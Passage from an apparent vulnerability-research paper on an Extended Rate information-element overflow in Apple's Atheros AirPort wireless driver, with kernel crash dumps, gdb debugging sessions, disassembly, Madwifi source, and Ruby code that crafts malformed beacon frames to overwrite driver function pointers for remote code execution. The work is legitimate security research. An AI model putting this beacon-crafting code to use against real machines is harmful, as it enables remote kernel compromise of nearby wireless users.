0x8001003b, CR2: 0x62413863, CR3: 0x021d7000, CR4: 0x000006e0 +EAX: 0x62413862, EBX: 0x00000003, ECX: 0x0c67bc8c, EDX: 0x00000003 +ESP: 0x62413863, EBP: 0x0c67bad4, ESI: 0x03717804, EDI: 0x0371787c +EFL: 0x00010202, EIP: 0x008c923d, CS: 0x00000008, DS: 0x0c670010 + +#3 0x00197c7d in trap_from_kernel () +#4 0x008c923d in ieee80211_saveie () +#5 0x008c7303 in sta_add () +#6 0x008bccb9 in ieee80211_add_scan () +#7 0x008cd799 in ieee80211_recv_mgmt () +#8 0x008ddbd9 in ath_recv_mgmt () +#9 0x008ce9a5 in ieee80211_input () +#10 0x008de86a in ath_intr () + +Example 2: Attempt to access 0xcc + +panic(cpu 1 caller 0x0019CADF): +Unresolved kernel trap (CPU 1, Type 14=pagefault), registers: +CR0: 0x8001003b, CR2: 0x000000cc, CR3: 0x021d7000, CR4: 0x000006a0 +EAX: 0x00000033, EBX: 0x037d8504, ECX: 0x036a4c78, EDX: 0x0360b610 +ESP: 0x000000cc, EBP: 0x0c6ebea4, ESI: 0x037d8504, EDI: 0x0369b46c +EFL: 0x00010206, EIP: 0x008c5f03, CS: 0x00000008, DS: 0x00000010 + +#3 0x00197c7d in trap_from_kernel () +#4 0x008c5f03 in sta_update_notseen () +#5 0x008c6ba0 in sta_pick_bss () +#6 0x008bd77c in scan_next () +#7 0x008bc314 in thread_call_func () + +Example 3: Attempt to copy from 0x41316341 + +eax 0xaca7000 181039104 +ecx 0xc98 3224 +edx 0x3263 12899 +ebx 0xf 15 +esp 0xc6e3714 0xc6e3714 +ebp 0xc6e3758 0xc6e3758 +esi 0x41316341 1093755713 +edi 0xaca7000 181039104 +eip 0x1933de 0x1933de +eflags 0x10203 66051 +cs 0x8 8 +ss 0x10 16 +ds 0x120010 1179664 +es 0xc6e0010 208535568 +fs 0x10 16 +gs 0x900048 9437256 +Program received signal SIGTRAP, Trace/breakpoint trap. +0x001933de in memcpy_common () +2: x/i $eip 0x1933de : repz movs DWORD PTR es:[edi],DWORD PTR ds:[esi] +#0 0x001933de in memcpy_common () +#1 0x03915004 in ?? () +#2 0x008c6083 in sta_iterate () +#3 0x008e52b7 in AirPort_Athr5424::ieee80211_notify_scan_done () +#4 0x008e55b9 in AirPort_Athr5424::setSCAN_REQ () +#5 0x008b2c91 in IO80211Scanner::scan () +#6 0x008aa00c in IO80211Controller::execCommand () +#7 0x0038e698 in IOCommandGate::runAction (this=0x3595300, +inAction=0x8a9c7c , arg0=0x8, arg1=0x399aea5, arg2=0x0, arg3=0xc6e3d2c) at +/SourceCache/xnu/xnu-792.9.72/iokit/Kernel/IOCommandGate.cpp:152 +#8 0x008a9284 in IO80211Controller::queueCommand () + +Tracking down the packet that crashes a wireless driver can be frustrating +because it's not necessarily the last packet to be received or transmitted. +This is important when the number of packets produced and injected can be as +many as several thousands per minute. Since the memory overwrites illustrated +above cover an entire 32 bit value, like 0x41414141, a method to tag which +packet number is responsible for the overwrite can help to cut down on this +frustration. + +A counter for packet tracking can be inserted into packets when at generation +time. There are a few specific places where storing this counter can help +with packet identification. The first place is the last 4 bytes of a BSSID +with the first two bytes remaining static. For example, 0xcc 0xcc 0x41 0x41 +0x41 0x01 is the BSSID of the first packet sent. When the last byte of the +MAC address reaches 0xff the next higher byte starts counting. As such, 0xcc +0xcc 0x41 0x41 0x01 0x01 is the BSSID for the 256th packet sent. Likewise, +the fuzzer can pad the information-element buffer in the same way with a +repeating pattern of 0x41 0x41 0x41 0x01 for the first packet sent. The reason +for padding the value with the extra data instead of just setting them to +0x00 is related to the page faults. While 0x41 0x41 0x41 0xf1 may +translate to a bad address and cause a page fault during access attempts, +0x00 0x00 0x43 0x12 may be valid and cause no problems. Since kernel +panics are the primary source of isolating the flaw at this point, they +need to cause a crash instead of silently allowing the kernel to continue +executing. + +Several tests reveal that the only anomaly common to all the packets that +cause overwrite is an overly long Extended Rate Element which is an IE sent by +the access point to advertise additional speeds, such as 11mpb, that the +access point supports. To verify this, the author changed the script so that +it would generate a distinctive pattern in the Extend Rate IE. This pattern +showing up in the crash dumps made it possible to prove that it was the +``Extended Rate'' IE that was the problem. The amount of the pattern found in +memory made it easy to determine how much memory was corrupted. The following +Ruby code shows how the packet was crafted that made it possible to come to +this conclusion: + +ssid = Rex::Text.rand_text_alphanumeric(rand(255)) +bssid = "\x61\x61\x61" + Rex::Text.rand_text(3) +seq = [rand(255)].pack('n') +xrate = Rex.Text.rand_pattern_create(240) + frame = + "\x80" + + "\x00" + + "\x00\x00" + + "\xff\xff\xff\xff\xff\xff" + + bssid + + bssid + + seq + + Rex::Text.rand_text(8) + + "\xff\xff" + + Rex::Text.rand_text(2) + + #ssid tag + "\x00" + ssid.length.chr + ssid + + #supported rates + "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + + #current channel + "\x03" + "\x01" + channel.chr + + #Xrate + "\x32" + xrate.length.chr + xrate + +When this packet is transmitted, the victim machine will not crash right away. +The vulnerable code does not process the packets the instant they are +received. The packets are instead only processed when the information is +needed for a scan. OS X produces a new scan every five minutes. As such, the +machine may take up to five minutes to crash after receiving a corrupted +packet. Pinning down this bug meant that forcing a scan would be necessary. + +As luck would have it, Apple provides a tool called airport for this sort of +thing (located in +/System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources). +Executing airport -z will disassociate the machine from whatever wireless +access point it is currently using. Executing airport -s will force the +driver to run a scan and report all access points within range. In order to +crash the machine quickly after a corrupted Extended Rate IE is sent, the +author ran the command airport -s -r 10000. The ``-r'' option tells the +airport command to repeat an action a given number of times which, in this +case, causes 10000 re-scans. + +Running this command would cause the machine to reliably crash in the same +manner every time. This makes it possible to figure out where, precisely, the +wireless driver is a crashing. In this case, the corrupted IE in the packet +that is transmitted causes a crash in a memcpy called from a function named +athcopyscanresults in the Apple driver. It appears that the attacker can +influence where the memcpy will read from and how much data will be copied. +Since an attacker can copy arbitrary data from one area of memory (such as the +packet) to another area of memory, it will most likely be possible to gain +code execution. + +If no scan is forced and the target machine is not associated with an access +point, a different crash will reliably occur in a memcmp called from a +function named staadd. The memcmp is meant to check to see if a BSSID is the +same as one that has been stored. However, the overflow corrupts a structure +so that it compares the pointer to the new BSSID against a pointer that the +attacker can set. + +Most of the beacon intervals in the test scripts are set to 0xffff, which is a +little over 67 seconds. This means that a machine that receives and adds one +of these beacon packets into its scan cache is not expecting to get another +update from the BSSID for a little over 67 seconds. Generally, management +frame fuzzing means the creation of something like a fake beacon frame that is +quickly injected and forgotten. A real AP would continue sending beacon +packets to let a potential client know it is still available. A driver will +wait up until its beacon interval before taking actions such as marking the AP +with the missed beacon as non-preferential for connection or even removing it +from the scan cache altogether. In order to have many packets processed, the +author set the beacon interval time to its maximum so the driver would not get +suspicious for at least 67 seconds, thus allowing time for the fake AP to go +through processing. In other words, most beacons are sent with intervals of +several times a second. By using the maximum interval, one only needs to send +a corrupted beacon packet once a minute. + +If the memcmp crash does not occur during normal operations, a crash in a +function called staupdate can occur. Although the specific locations that the +crash occurs at within this function can be different, the crash will occur +reliably with the same data if the malicious frame is the same. + +Analyzing these repeated crashes helps to localize where memory corruption is +occurring in the code. This can include static analysis using tools like IDA +Pro to read the compiled driver code. This can also include dynamic analysis +such as by stepping through the code with a debugger like gdb to watch +step-by-step what the driver does when it overwrites memory. Debugging a +kernel driver in real-time requires setting up two machines for gdb and +enabling the kernel core dump facility. There are numerous documents on how to +set up live kernel debugging with gdb, so rather than rehashing the +information. + +The specific OS X boot settings the author uses involve setting the nvram +boot-args argument to debug=0xd44 panicdip=192.168.1.1 –v. This setting is +the easiest for two machine debugging, however, the target machine will no +longer produce a panic log. + + Things I Wish Google told me: kernel core dumps on Intel are broken + + The core kernel dumping functionality on the Intel architecture appears to + be broken. Following the directions for the target and development machine + yielded no core dumps. After investigating this problem, it seems to stem + from the fact that the panicing machine performs no ARP resolution during a + crash. The panicing machine instead forwards information to its default + router. OS X expects the default router to forward this information to the + core dump server. The author has found that the best way to encourage proper + handling is to place the development machine on a different subnet from the + target machine. Keep in mind that this information was gleaned through a + series of changes and tests and observations with a network sniffer. + Setting the ARP entry statically with the command arp -s did not help. + +4) Debugging the Crash + +One of the many benefits of remote kernel debugging is the ability to view a +stack back trace with symbol information. The vulnerability described in the +previous chapter showed crashes in many different functions such as staadd, +ath_copy_scan_results, and sta_update_not_seen. + +Googling these function names will reveal that many of them are present in the +open source Madwifi project for Atheros based wireless hardware. They are also +present in the FreeBSD net80211 project. Apple based their driver on these +open-source projects. Since these projects use the BSD open-source license, +Apple is not required to open their source code modifications. + +While the Apple Atheros driver does not exactly match the open source +projects, they match close enough to make reverse engineering much easier. The +source tree for the Apple Airport driver and Madwifi are so close that the +same debug flags work. Using sysctl to set the debug options on either +debug.net80211 or debug.athdriver will cause a flood of diagnostic information +to fill /var/log/system.log. + +TestBox:~ root# sysctl debug +debug.bpf_bufsize: 4096 +debug.bpf_maxbufsize: 524288 +debug.bpf_maxdevices: 256 +debug.iokit: 0 +debug.net80211: 0 0 +debug.athdriver: 0 0 +TestBox:~ root# sysctl -w debug.net80211=0xffffffff +debug.net80211: 0 0 -> 2147483647 2147483647 +TestBox:~ root# +TestBox:~ root# tail /var/log/system.log +Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard +[en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 33 +Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard +[en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 33 +Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard +[en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 32 +Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard +[en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 32 +Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard +[en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 31 +Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard +[en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 32 +Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard +[en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 32 +Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard +[en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 31 +Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard +[en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 31 +TestBox:~ root# + +One can read what each bit does and how they can be set using the debug tools +found in the tools directory of the Madwifi source tree. The open-source +80211debug.c file corresponds to Apple's debug.net80211 module and athdebug.c +corresponds to debug.athdriver. An enum found at the top of each debug source +file defines the bit mask and what functionality it enables. You can activate +all debugging functionality by setting the bit field to 0xffffffff. However, +when doing this, a problem arises due to the large amount of data written to +the log file. The function that performs the logging, IOLog, cannot always +keep up with the flood of messages and does not know or care if a write is +unsuccessful. For this reason, targeting a specific function may give more +information and help to ensure that it is not buried under a wave of data. For +instance, the following command will only show debug messages that involve the +scanning code where this vulnerability occurs. + +If one does not want to remember the bit fields, the Madwifi tools required +only minor tweaks to work with OS X, and the source is in the accompanying tar +ball with other examples for this paper. + +The task of kernel debugging ultimately rests with gdb which is not +well-suited for the job. Those people who learned kernel hacking with SoftICE +will be unhappy with gdb. It lacks basic debugger functionality such as the +ability to search through memory. Tracepoints do not work nor do hardware +breakpoints. However, it makes up for the lack of built-in functionality with +the ability to script and the ability to set commands to execute after a +breakpoint is reached. Stringing a lot of these features together makes it +possible to hack together tools that help to supplement missing features. A +short list of helpful tricks discovered during the use of gdb are included in +the following sections. + +4.1) Ghetto Profiling + +Although several texts reference the ability to enable profiling by rebuilding +the xnu kernel under OS X, that never seemed to work correctly for me. For +this reason, the author kept a written list of interesting offsets and profile +other information. For example, when you break in staadd, ECX contains a +pointer to the packet that is about to parse. To use this as a ghetto +profiler, the author would set a breakpoint at the beginning of staadd. Using +this command's feature, a conditional is used to make sure ECX is not NULL +and, if not, print the first 20 bytes of it. The debugger is then told to +continue. + +(gdb) break sta_add +Breakpoint 1 at 0x8f2e35 +(gdb) commands +Type your commands for when breakpoint 1 is hit, one per line. +End with a line saying just "end". +> if $ecx > 0x100 + >x/20x $ecx + >end +>continue +>end + +Every time this breakpoint is hit it will print the first 20 bytes of ECX and +then continue. This is useful because when the machine does crash one can see +the packet it was processing at the time. This is what it looks like when +running. + +Breakpoint 1, 0x008f2e35 in sta_add () +2: x/i $eip 0x8f2e35 : sub esp,0x3c +0x1e34f000: 0x013a0050 0x04cb1600 0x110062a3 0xfeaffb50 +0x1e34f010: 0xfb501100 0x2ef0feaf 0xf6773728 0x00000192 +0x1e34f020: 0x04110064 0x68730700 0x656b6e69 0x8204016e +0x1e34f030: 0x03968b84 0x16dd0b01 0x01f25000 0x50000001 +0x1e34f040: 0x000102f2 0x02f25000 0x50000001 0x060402f2 + +Breakpoint 1, 0x008f2e35 in sta_add () +2: x/i $eip 0x8f2e35 : sub esp,0x3c +0x1e36a000: 0x00000080 0xffffffff 0x6161ffff 0x8710ec61 +0x1e36a010: 0xec616161 0xc1c08710 0xc5962377 0xa185eaae +0x1e36a020: 0xa9b1ffff 0x55441300 0x30455362 0x34634972 +0x1e36a030: 0x4530614a 0x6f557678 0x82080137 0x0c968b84 +0x1e36a040: 0x03483018 0xf0320b01 0x41414141 0x41414141 + +The first packet is a probe response which can be determined keying off the 50 +that starts the packet. The integer format should be read in reverse +byte-order such that 0x013a0050 is actually 0x50 0x0x3a 0x01. The next packet +is 0x80 0x00 0x00 0x00 which is a beacon frame with a BSSID of 0x61 0x61 0x61 +0xec 0x10 0x87. This represents a packet that was created by the packet +generation script. + +The ghetto profiling works great on less frequently invoked breakpoints. The +more hits a breakpoint receives, the greater the load to a machine. + +4.2) kgmacros + +When gdb is started a file ``kgmacors'' should be sourced that contains a lot +of useful debugging macros from the kernel debug kit. Most of these functions +do not seem to work on the Intel platform. In some cases, one may get an +error message stating that the command does not work with this +architecture. In other cases, it may just silently fail. Although some +commands like panic log are useful, other commands like showx86backtrace +can actually destroy data needed for debugging. + +4.3) Simplifying things + +There is a lot to do to get gdb setup to do live kernel debugging. One must +download the correct kernel debug kit, create the correct symbols on the +target machine, and move them to the debug machine. Following that, one must +start gdb, import the symbols, generate a NMI on the target machine, and +connect the debugger. These tasks should be automated as much as possible or +one will be stuck typing the same commands repeatedly. On the target machine, +the command to create the symbols for AirPortAtheros5424 is simple: + +Kextload -A -s /tmp/symbols + /System/Library/Extensions/IO80211Family.kext/Contents/PlugIns/AirPortAtheros5424.kext + +This will create the required symbols in /tmp/symbols/. /tmp/symbols can be +archived and transferred to the debugging machine. On the debugging machine a +script will do most of the manual tasks and define a macro for connecting to +the target machine. The contents of OS Xkernelsetup: + +file /Volumes/KernelDebugKit/mach_kernel +set architecture i386 +source /Volumes/KernelDebugKit/kgmacros +add-symbol-file /Users/dave/symbols/com.apple.driver.AirPortAtheros5424.sym +add-symbol-file /Users/dave/symbols/com.apple.iokit.IOPCIFamily.sym +add-symbol-file /Users/dave/symbols/com.apple.iokit.IO80211Family.sym +add-symbol-file /Users/dave/symbols/com.apple.iokit.IONetworkingFamily.sym +set disassembly-flavor intel + +define knock + target remote-kdp + attach $arg0 +end + +This script is sourced instead of running all the normal startup activities. +The knock macro replaces having to type two commands every time one needs to +connect to the target machine. + +(gdb) knock 192.168.1.20 +Connected. +(gdb) + +One thing to note about kernel debugging is that although the author has not +observed this happening a lot, the module one is auditing can load at a +different address which means new symbols should be generated otherwise +nothing will match up correctly. From the author's experience, one can boot a +machine 100 times and the module will be at the same address 99 out of 100 +times, and the one time it is not a simple reboot should bring the module back +to the expected address. + +5) Analyzing Madwifi + +The madwifi source code shows that most of the crashes occur while iterating +over the scan cache stored in a variable known as scanstate. To add an entry +to the scan cache a function called staadd parses management frames into a +structure called staentry. + +struct sta_entry { + struct ieee80211_scan_entry base; + TAILQ_ENTRY(sta_entry) se_list; + LIST_ENTRY(sta_entry) se_hash; + u_int8_t se_fails; /* failure to associate count */ + u_int8_t se_seen; /* seen during current scan */ + u_int8_t se_notseen; /* not seen in previous scan */ + u_int32_t se_avgrssi; /* LPF rssi state */ + unsigned long se_lastupdate; /* time of last update */ + unsigned long se_lastfail; /* time of last failure */ + unsigned long se_lastassoc; /* time of last association */ + u_int se_scangen; /* iterator scan gen# */ +}; + +The staadd function is too long to print here but can be found in the +net80211/ieee80211scansta.c source file. In this function, an assignment is +performed that sets the copy destination for all the beacon data into the base +variable from staentry. + +ise = &se->base; + +The ieee80211scanentry structure is defined as the follows. Note that the +Extended Rate buffer is defined as an array with a size of +IEEE80211_RATE_MAX_SIZE + 2. This is much like other buffer overflows where +programmers reserve fixed sized buffers in memory to hold variable length data +from packets. + +/* + * Scan cache entry format used when exporting data from a policy + * module; this data may be represented some other way internally. + */ +struct ieee80211_scan_entry { + u_int8_t se_macaddr[IEEE80211_ADDR_LEN]; + u_int8_t se_bssid[IEEE80211_ADDR_LEN]; + u_int8_t se_ssid[2 + IEEE80211_NWID_LEN]; + u_int8_t se_rates[2 + IEEE80211_RATE_MAXSIZE]; + u_int8_t se_xrates[2 + IEEE80211_RATE_MAXSIZE]; + u_int32_t se_rstamp; /* recv timestamp */ + union { + u_int8_t data[8]; + u_int64_t tsf; + } se_tstamp; /* from last rcv'd beacon */ + u_int16_t se_intval; /* beacon interval (host byte order */ + u_int16_t se_capinfo; /* capabilities (host byte order) */ + struct ieee80211_channel *se_chan;/* channel where sta found */ + u_int16_t se_timoff; /* byte offset to TIM ie */ + u_int16_t se_fhdwell; /* FH only (host byte order) */ + u_int8_t se_fhindex; /* FH only */ + u_int8_t se_erp; /* ERP from beacon/probe resp*/ + int8_t se_rssi; /* avg'd recv ssi */ + u_int8_t se_dtimperiod; /* DTIM period */ + u_int8_t *se_wpa_ie; /* captured WPA ie */ + u_int8_t *se_rsn_ie; /* captured RSN ie */ + u_int8_t *se_wme_ie; /* captured WME ie */ + u_int8_t *se_ath_ie; /* captured Atheros ie */ + u_int se_age; /* age of entry (0 on create) */ +}; + +IEEE80211_RATE_MAX_SIZE is defined in ieee80211.h as the following: + + #define IEEE80211_RATE_MAXSIZE 15 /* max rates we'll handle */ + +The author was initially puzzled because all research to this point showed +that the Extended Rate buffer was the culprit but the madwifi source code had +a check for a maximum length before the copy happened. At this point, the +corruption must have occurred before the staadd function or the length check +did not work as expected. To figure out what might be missing, the author set +a break point at the beginning of staadd and walked through the code. +Single-stepping showed that the memcpy was called at 0x008f3188. This was +verified by looking at the size and the source being passed to the memcpy. +Since the Extended Rate element in a script-generated packet it is noticeably +larger than in a typical packet, a conditional breakpoint can be set when the +size argument is pushed to the stack for the memcpy. The following debugger +output shows how the system behaves when this breakpoint is set: + +(gdb) break *0x008f3188 if $eax > 100 +Breakpoint 2 at 0x8f3188 +(gdb) c +Continuing. + +Breakpoint 2, 0x008f3188 in sta_add () +2: x/i $eip 0x8f3188 : mov DWORD PTR [esp+8],eax +(gdb) stepi +0x008f318c in sta_add () +2: x/i $eip 0x8f318c : mov DWORD PTR [esp+4],edx +(gdb) +0x008f3190 in sta_add () +2: x/i $eip 0x8f3190 : lea eax,[esi+63] +(gdb) +0x008f3193 in sta_add () +2: x/i $eip 0x8f3193 : mov DWORD PTR [esp],eax +(gdb) +0x008f3196 in sta_add () +2: x/i $eip 0x8f3196 : call 0x1933c8 +(gdb) x/20x $esp +0xc82badc: 0x03aeb643 0x1e36a046 0x000000f2 0x00000080 +0xc82baec: 0x0c82bb24 0x0c82bb04 0x0c82bc8c 0x03800004 +0xc82bafc: 0x0393d72c 0x0393d704 0x1e36a00a 0x0380246c +0xc82bb0c: 0x008f2e35 0x00000014 0x00000302 0x0c82bc8c +0xc82bb1c: 0x00000080 0x1e36a138 0x0c82bb84 0x008e8cb9 +(gdb) x/20x 0x1e36a046 +0x1e36a046: 0x4141f032 0x41414141 0x41414141 0x41414141 +0x1e36a056: 0x41414141 0x41414141 0x41414141 0x41414141 +0x1e36a066: 0x41414141 0x41414141 0x41414141 0x41414141 +0x1e36a076: 0x41414141 0x41414141 0x41414141 0x41414141 +0x1e36a086: 0x41414141 0x41414141 0x41414141 0x41414141 +(gdb) + +Based on the location of the memcpy call, it is necessary to calculate the +relative address within the binary which can be accomplished by doing 0x8f3196 +- 0x8e7000 - 0x1000 = 0xB196. The code found within the driver shows +that although there is a length check in the open source driver, it's not +actually present in the OS X binary driver. + +__text:0000B177 mov ecx, [ebp+scanparam] +__text:0000B17A mov edx, [ecx+28h] +__text:0000B17D test edx, edx +__text:0000B17F jz short loc_B19D +__text:0000B181 movzx eax, byte ptr [edx+1] +__text:0000B185 add eax, 2 +__text:0000B188 mov [esp+48h+var_40], eax +__text:0000B18C mov [esp+48h+var_44], edx +__text:0000B190 lea eax, [esi+63] +__text:0000B193 mov [esp+48h+ic], eax +__text:0000B196 call near ptr _memcpy ; xrate memcpy + +In this example, the copy size is 0xf2 and the ``Extended Rate'' buffer is +being copied. Verifying that there is actually no length check means that +adjacent data found within a ieee80211scanentry is being corrupted, such as +another staentry structure. + +This is where the first of two serious problems manifests itself. It is +possible to overwrite fields in a structure, but not typical control +structures like stack or heap frames that are typically used to gain code +execution. This makes direct code execution more difficult. + +6) Getting Code Execution + +The result of this flaw is that many things beyond the Extended Rate buffer in +the ieee80211scanentry structure are corrupted. In a traditional stack +overflow, control of execution flow is obtained directly by overwriting an +important value, such as the return address. The corruption caused by the +``Extended Rate'' bug is more complicated due to the apparent lack of adjacent +control structures. + +The most promising avenue for getting execution can be found in a function +named athcopyscanresults. This function uses the fields that are overwritten +to copy memory. An attacker can control the size of the copy and the source +of the copy. In addition to crashing reliably on the same data, the size of +the memcpy is two bytes wide meaning that up to 65535 bytes can be copied. +Since the destination of the memcpy is a structure that ends with a function +pointer, the hope is that enough data can written outside of the destination +buffer to the point where the function pointer is overwritten. In this way, +the next time the function pointer is called, the caller would instead jump to +whatever address is now stored in the function pointer. In other words, this +represents a two-stage overwrite. The first overwrite does not provide direct +code execution, but it allows an attacker to create a second overwrite that +will. The Beacon packet contains a number of buffers one can use for this +second-stage overwrite. Thus, an overflow in one buffer in the packet (the +Extended Rate IE) allows an attacker to control how a second buffer is copied +(in this case, the Robust Security Network (RSN) IE). It is the copying of +the second buffer that will permit code execution. Below are the registers +and the stack trace of a call to the second memcpy that is being discussed. + +(gdb) bt +#0 0x001933de in memcpy_common () +#1 0x038ce804 in ?? () +#2 0x008c6083 in sta_iterate () +#3 0x008e52b7 in AirPort_Athr5424::ieee80211_notify_scan_done () +#4 0x008e55b9 in AirPort_Athr5424::setSCAN_REQ () + +(gdb) info registers +eax 0xaca0000 181010432 +ecx 0xc98 3224 +edx 0x3263 12899 +ebx 0x8 8 +esp 0xc71b714 0xc71b714 +ebp 0xc71b758 0xc71b758 +esi 0x41316341 1093755713 +edi 0xaca0000 181010432 +eip 0x1933de 0x1933de +eflags 0x10203 66051 +cs 0x8 8 +ss 0x10 16 +ds 0x120010 1179664 +es 0xc710010 208732176 +fs 0x10 16 +gs 0x900048 9437256 +(gdb) + +EDX contains the size of the copy before its loaded into ECX. The bytes in +sequence were 0x41 0x63 0x31 0x41 0x32 0x63 meaning that the source address +(what is found in ESI) and the copy size are adjacent to one other in the +packet. The pattern that overwrote the buffer was also always 0x41 from the +start of the ``Extended Rate'' field in the Beacon packet. + +Although this seems like an interesting plan, a call to IOMalloc right before +the memcpy makes sure the destination buffer has enough space for the copy. +Additionally, although a copy of up to 0xffff bytes is possible, it's not +actually writing outside of any bounds. The disassembly for the memcpy call +in athcopyscanresults is shown below: + +__text:000260AA call near ptr _IOMalloc +__text:000260AF mov edx, eax +__text:000260B1 mov ecx, [ebp+var_1C] +__text:000260B4 mov [ecx+88h], eax +__text:000260BA test eax, eax +__text:000260BC jz loc_262C8 +__text:000260C2 movzx eax, word ptr [esi+84h] +__text:000260C9 mov [esp+38h+var_30], eax +__text:000260CD mov eax, [esi+80h] +__text:000260D3 mov [esp+38h+var_34], eax +__text:000260D7 mov [esp+38h+var_38], edx +__text:000260DA call near ptr _memcpy + +The author could go on for hours about what other methods also did not work, +but what does work seems more interesting. Luckily, almost immediately after +the corruption of memory, the driver calls a function named ieee80211savie +four times. The purpose of these calls is to save other Information Elements +(such as RSN, WME, and WPA) from the Beacon frame into the staentry structure. +The source code from the Madwifi version of ieee80211saveie: + +void ieee80211_saveie(u_int8_t **iep, const u_int8_t *ie) +{ + u_int ielen = ie[1] + 2; + /* + * Record information element for later use. + */ + if (*iep == NULL || (*iep)[1] != ie[1]) { + if (*iep != NULL) + FREE(*iep, M_DEVBUF); + MALLOC(*iep, void*, ielen, M_DEVBUF, M_NOWAIT); + } + if (*iep != NULL) + memcpy(*iep, ie, ielen); +} + +A quick synopsis of this function's purpose is that a pointer to a pointer is +passed as the address to copy data to. There is some sanity checking to see +if the destination address is NULL or if the size of the stored buffer at the +destination address is different than the one just passed in. If either of +these conditions are true, a new buffer is malloced and the memcpy works +just fine. + +Since an attacker can control every element in the structure that's passed in +as the place to save the buffer to, the check to see if a malloc should be +performed can be avoided and the buffer can be copied anywhere into memory the +attacker chooses. This is pretty simple. All that needed is the address the +data will be copied to, plus 1, equals the length of the IE buffer that is to +be saved. + +Although there are countless possibilities for what to overwrite, the target +buffer needs to meet a few basic requirements. Preferably, an attacker will +overwrite a function pointer. Since it seems that the driver loads at the +same address every time, overwriting something that that is a fixed offset +inside the driver is preferable to minimize the amount of damage done outside +the driver because one will want the machine to keep running long enough to +execute a payload. + +There is a structure called stadefault. This structure keeps function pointers +needed to carry out certain elements of driver operations and luckily it +appears to be recreated quite often so that any damage done to it could +automatically repair itself. Here is the structure from the Madwifi source +code: + +static const struct ieee80211_scanner sta_default = { + .scan_name = "default", + .scan_attach = sta_attach, + .scan_detach = sta_detach, + .scan_start = sta_start, + .scan_restart = sta_restart, + .scan_cancel = sta_cancel, + .scan_end = sta_pick_bss, + .scan_flush = sta_flush, + .scan_add = sta_add, + .scan_age = sta_age, + .scan_iterate = sta_iterate, + .scan_assoc_fail = sta_assoc_fail, + .scan_assoc_success = sta_assoc_success, + .scan_default = ieee80211_sta_join, +}; + +During actual live debugging its contents can be seen as: + +(gdb) x/20x sta_default +0x931ee0 : 0x0092e050 0x008f1543 0x008f16c6 0x008f18c7 +0x931ef0 : 0x008f19b5 0x008f19cc 0x008f2b7d 0x008f1694 +0x931f00 : 0x008f2e2f 0x008f261e 0x008f20bb 0x008f2188 +0x931f10 : 0x008f1fd5 0x00000000 0x00000000 0x00000000 +0x931f20 : 0x000000a0 0x00000140 0x000000a0 0x000000c0 +(gdb) + +As an initial test, the author overwrote every function pointer in the +structure with a pattern such as 0x61413761 (or aA7a in ASCII, which is the +typical Metasploit buffer padding pattern). A crash dump with an error message +about failing to execute code at a bad address like 0x61413761 proves that +remote code execution is theoretically possible. + +To help better understand this, it is helpful to single-step through the +staadd function after sending an Extended Rate IE that is larger than 100 +bytes. It is also helpful to then single-step through the function that +handles saving the RSN IE buffer from the packet called. Finally, it is +useful to single-step through the ieee80211saveie until the size comparison is +hit. The kernel should crash the next time any of the overwritten function +pointers are called. The code used to generate the packet during this single +step is shown below: + + ssid = Rex::Text.rand_text_alphanumeric(rand(255)) + bssid = "\x61\x61\x61" + Rex::Text.rand_text(3) + seq = [rand(255)].pack('n') + xrate = make_xrate() + rsn = make_rsn() + frame = + "\x80" + + "\x00" + + "\x00\x00" + + "\xff\xff\xff\xff\xff\xff" + + bssid + + bssid + + seq + + Rex::Text.rand_text(8) + + "\xff\xff" + + Rex::Text.rand_text(2) + + #ssid tag + "\x00" + ssid.length.chr + ssid + + #supported rates + "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + + #current channel + "\x03" + "\x01" + channel.chr + + #Xrate + xrate + + #RSN + rsn + +def make_xrate + #calculate the offset that RSN needs to overwrite + staRsnOff = 0x4aee0 + kextAddr = datastore['KEXT_OFF'].to_i + staStruct = kextAddr + staRsnOff + + #build the xrate_frame + xrate_build = Rex::Text.pattern_create(240) #base of IE + + #crashes often occur in the following locations so they are blanked + xrate_build[67, 2]="\x00\x00" + xrate_build[71, 4]="\x00\x00\x00\x00" + xrate_build[79, 4]="\x00\x00\x00\x00" + + #Overwrite address for RSN element + xrate_build[55, 4]=[staStruct].pack('V') + xrate_frame = + "\x32" + + xrate_build.length.chr + + xrate_build + return xrate_frame +end + +def make_rsn + rsn_data = Rex::Text.pattern_Create(223) + rsn_frame = + "\x30" + + rsn_data.length.chr + + rsn_data + return rsn_frame +end + +And the associated single-step through the functions: + +Breakpoint 4, 0x008f3188 in sta_add () +2: x/i $eip 0x8f3188 : mov DWORD PTR [esp+8],eax +(gdb) advance *0x8f32fe +0x008f32fe in sta_add () +2: x/i $eip 0x8f32fe : call 0x8f521b +(gdb) stepi +0x008f521b in ieee80211_saveie () +2: x/i $eip 0x8f521b : push ebp +(gdb) +0x008f521c in ieee80211_saveie () +2: x/i $eip 0x8f521c : mov ebp,esp +(gdb) +0x008f521e in ieee80211_saveie () +2: x/i $eip 0x8f521e : push edi +(gdb) +0x008f521f in ieee80211_saveie () +2: x/i $eip 0x8f521f : push esi +(gdb) +0x008f5220 in 